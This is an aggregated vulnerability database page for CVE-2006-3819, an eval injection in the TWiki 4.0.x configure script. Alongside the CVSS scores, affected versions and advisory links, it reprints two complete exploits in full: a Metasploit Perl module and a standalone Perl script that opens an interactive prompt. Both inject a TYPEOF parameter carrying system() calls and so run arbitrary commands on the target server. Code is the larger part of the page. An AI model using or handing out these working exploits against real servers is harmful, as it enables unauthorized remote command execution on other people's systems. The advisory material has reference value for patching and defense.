CVE-2006-3819
CVSS 7.5
Published: 2006-07-26 21:04:00
Revised: 2011-03-07 21:39:32

[Original] Eval injection vulnerability in the configure script in TWiki 4.0.0 through 4.0.4 allows remote attackers to execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".


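[CNNVD] TWiki Configure Script TYPEOF Parameter Eval Injection Vulnerability (CNNVD-200607-447)

        The configure script in TWiki 4.0.0 through 4.0.4 contains an eval injection vulnerability. Remote attackers can execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".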

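- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]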

- CPE (Affected platforms and products)

cpe:/a:twiki:twiki:4.0.2
cpe:/a:twiki:twiki:4.0.3
cpe:/a:twiki:twiki:4.0.4
cpe:/a:twiki:twiki:4.0
cpe:/a:twiki:twiki:4.0.1
cpe:/a:twiki:twiki:4.0.0

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3819
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3819
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-447
(Official data source) CNNVD

- Other links and resources

http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
(PATCH)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure
http://www.vupen.com/english/advisories/2006/2995
(UNKNOWN)  VUPEN  ADV-2006-2995
http://xforce.iss.net/xforce/xfdb/28049
(UNKNOWN)  XF  twiki-configure-command-injection(28049)
http://www.securityfocus.com/bid/19188
(UNKNOWN)  BID  19188
http://www.osvdb.org/displayvuln.php?osvdb_id=27556
(UNKNOWN)  OSVDB  27556
http://securitytracker.com/id?1016603
(UNKNOWN)  SECTRACK  1016603
http://secunia.com/advisories/21235
(UNKNOWN)  SECUNIA  21235

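- Vulnerability information

TWiki Configure Script TYPEOF Parameter Eval Injection Vulnerability
High risk  Input validation
2006-07-26 00:00:00 2006-07-27 00:00:00
Remote
        The configure script in TWiki 4.0.0 through 4.0.4 contains an eval injection vulnerability. Remote attackers can execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".

- Advisories and patches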

        

- Vulnerability information (2110)

TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta) (EDBID:2110)
php webapps
2006-08-02 Verified
0 David Maciejak
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::twiki_config_typeof;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { 
	'HttpBoundary' => ['Mtb06z', 'HTTP boundary']
};

my $info = {
	'Name'     => 'Twiki Configure script TYPEOF Parameter Remote Command Execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'David Maciejak <david dot maciejak at gmail dot com>' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 1,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'DIR'   => [1, 'DATA', 'Directory of Twiki', '/twiki'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
		This module exploits an arbitrary command execution vulnerability in the
	Twiki configure script. All versions of Twiki prior to 
	4.0.4 hotfix 2 are vulnerable. Patch HotFix04x00x04x02 is available on twiki.org homepage.
}),
	'Refs' =>
	  [
		['BID', '19188'],
		['CVE', '2006-3819'],
		['OSVDB', '27556'],
	  ],

	'Payload' =>
	  {
		'Space' => 128,
		'Keys'  => ['cmd','cmd_bash'],
	  },

	'Keys' => ['twiki'],

	'DisclosureDate' => 'Jul 27 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->VHost;
	my $target_port    = $self->GetVar('RPORT');
	my $dir            = $self->GetVar('DIR');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $cmd            = $encodedPayload->RawPayload;
	my $boundary		 = $self->GetLocal('HttpBoundary');		

	$cmd=
		"\r\n--".$boundary."\r\n".
		"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
		"update\r\n".
		"--".$boundary.
		"Content-Disposition: form-data; name=\"TYPEOF:{system('$cmd')}\"\r\n\r\n".
		"BOOLEAN\r\n".
		"--".$boundary;

	my $proto="http";
	if ($self->GetVar('SSL'))
	{
		$proto.="s";
	}

	 my $request =
    	"POST ".$dir."/bin/configure HTTP/1.1\r\n".
		"Content-Type: multipart/form-data; boundary=".$boundary."\r\n".
		"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\r\n".
		"Host: $target_host\r\n".
		"Referer: ".$proto."://".$target_host.$dir."/bin/configure\r\n".
		"Accept: image/gif, image/x-xbitmap, image/jpeg, image/png\r\n".
		"Accept-Language: en\r\n".
		"Content-Length: ". length($cmd). "\r\n\r\n".
		$cmd;

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr' => $target_host,
		'PeerPort' => $target_port,
		'SSL'      => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($request);

	my $results = $s->Recv(-1, 200);

	if ($results=~ /^transfer-encoding:[ \t]*chunked\b/im){
		my @extract_result;
		my @results = split ( /\r\n/, $results );

		chomp @results;
		my $fill_extract_result=0;
		my $end_break=0;
		my $i=0;
		while ( !$end_break && ($i < @results)){
			if ($results[$i] =~ /\<div id=\"patternScreen\"\>/)
			{
				$fill_extract_result=0;
				$end_break=1;
			}
			if ($fill_extract_result>0) {
					push(@extract_result,$results[$i]);
			}
			if ($results[$i] =~ /\<body class=\"patternNoViewPage\"\>/)
			{
				$fill_extract_result=1;
			}
			$i++;
		}

		if (@extract_result < 3) {
				$self->PrintLine("[*] Target may be not vulnerable, or you have used ';' char in CMD");	
		}
		else {
			for ($i=1;$i<@extract_result;$i+=2) {
				chomp @extract_result;
				$self->PrintLine("$extract_result[$i]");
			}
		}
	}

	$s->Close();
	return;
}

sub VHost {
	my $self = shift;
	my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
	return $name;
}

1;

# milw0rm.com [2006-08-02]
		

- Vulnerability information (2143)

TWiki <= 4.0.4 (configure) Remote Command Execution Exploit (EDBID:2143)
php webapps
2006-08-07 Verified
0 Javier Olascoaga
N/A
#!/usr/bin/perl 
# Tue Aug  1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1;   # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
		print "tinkiwinki> "; # phf haquerz style
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my ($cmd) = @_;
    my $ok	=	0;
    my $socket;
    LWP::Debug::level('+') if $debug; # but remember this is crap :D
    my $ua = new LWP::UserAgent();   
    $ua->agent("safari/zoo"); 
    if ($host !~ /^http/) {
	$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
    }
    my $req = HTTP::Request->new(POST => $host.$dir);
    $req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
    $ua->proxy(['http'] => $proxy) if $proxy;
    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    print $req->as_string() if $debug; 
    my $res = $ua->request($req);
    my $html = $res->content(); 
    $html =~ m/<body.*?>(.*?)<div/si; # <pus>
    print $1."\n";
    if ($debug) {
		open (DEBG, ">wikidebug");
		print DEBG $html;
    }
}
sub help {
    print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /twiki/bin/configure\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}
exit 0;
# <END OF EXPLOIT>

# milw0rm.com [2006-08-07]
		

- Vulnerability information

27556
TWiki twiki/bin/configure TYPEOF Parameter Arbitrary Command Execution
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-07-26 Unknown
2006-07-26 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

TWiki Configure Script TYPEOF Parameter Remote Command Execution Vulnerability
Input Validation Error 19188
Yes No
2006-07-27 12:00:00 2006-08-08 11:06:00
This vulnerability was discovered by Ben Wheeler.

- Affected software versions

TWiki TWiki 4.0.4
TWiki TWiki 4.0.3
TWiki TWiki 4.0.2
TWiki TWiki 4.0.1
TWiki TWiki 0

- Vulnerability discussion

TWiki is prone to a remote command-execution vulnerability.

Attackers can exploit this issue to execute arbitrary system commands with the privileges of the webserver process.

- Exploitation

Attackers can exploit this issue via a web client.

The following exploit programs are available:

- Solution

The vendor has released an advisory to address this issue. Please see the referenced advisory for more information.

- Related references
